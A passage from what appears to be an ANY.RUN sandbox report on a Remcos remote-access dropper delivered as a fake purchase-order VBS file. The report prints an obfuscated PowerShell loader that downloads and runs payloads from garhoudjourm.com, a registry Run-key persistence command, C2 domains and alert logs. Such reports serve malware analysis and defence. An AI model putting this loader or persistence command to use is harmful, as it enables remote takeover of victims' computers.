mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:Barcelona
Value:
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:(1468) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Strudsmavers
Value:
%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\shibuetgtst-WMSLPY
Operation:writeName:exepath
Value:
C3EC280971D51BF3BD1BE0CBF4899DC9D8CD16F22FE542B27F49ACD0FE6C344358A524861E8B510C4840A2F08766CEE8174E3C8098378764B15D3D8EEC21974B
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\shibuetgtst-WMSLPY
Operation:writeName:licence
Value:
886BC4600CCA505DB85B1A88C2EACC36
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\shibuetgtst-WMSLPY
Operation:writeName:time
Value:
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
0
Suspicious files
3
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
4428powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:7ED09665585A18265DF3B69BB3E4C45A
SHA256:57AA02DC7408C7EF62F64819554C5C615F6A84F9D098F2D7F2C80CD75EB9AF49
4528powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gzxkv0zs.kon.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4528powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cdh4fugu.hl5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4428powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_djf2ljdo.4n4.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5544msiexec.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:5A9AAD05E5C4F201BE545CA54A115F64
SHA256:68CF6A748B0AE4482CBA3C2165586637DE17CA1F479ED257E4813A358BD240FB
4428powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d0pvmvzm.nds.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5544msiexec.exeC:\Users\admin\AppData\Roaming\hmbnspt.datbinary
MD5:A967895DDA0070D77AC66FEC2ED15E2C
SHA256:D114795D12971D1C4C4B2953AAD905E9294E7ED4792921E7AB76B5F5B0085039
4428powershell.exeC:\Users\admin\AppData\Roaming\Glacialtid.Sestext
MD5:4CF5AC6122FAE42909350E40FBDEB8EB
SHA256:4DA60CE98680DAA52F0D9404E304ADC4C0508FA429DD133EEBA0976B3DC8DC89
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
23
DNS requests
8
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1864
RUXIMICS.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
448
svchost.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1864
RUXIMICS.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
448
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5544
msiexec.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
malicious
GET
200
104.21.91.199:443
https://garhoudjourm.com/Key1.png
unknown
text
418 Kb
GET
200
104.21.91.199:443
https://garhoudjourm.com/Key.png
unknown
binary
481 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1864
RUXIMICS.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
448
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
448
svchost.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
1864
RUXIMICS.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
448
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.174
whitelisted
crl.microsoft.com
  • 2.16.164.9
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
garhoudjourm.com
  • 172.67.179.52
  • 104.21.91.199
unknown
iwarsut775laudryed1.duckdns.org
  • 172.111.137.135
malicious
geoplugin.net
  • 178.237.33.50
malicious
self.events.data.microsoft.com
  • 51.104.15.253
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
5544
msiexec.exe
Malware Command and Control Activity Detected
ET MALWARE Remcos 3.x Unencrypted Checkin
5544
msiexec.exe
Malware Command and Control Activity Detected
ET MALWARE Remcos 3.x Unencrypted Server Response
5544
msiexec.exe
Malware Command and Control Activity Detected
ET MALWARE Remcos 3.x Unencrypted Server Response
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
doc02122024782020031808174KR1802122024_po_doc_00000991KB.vbs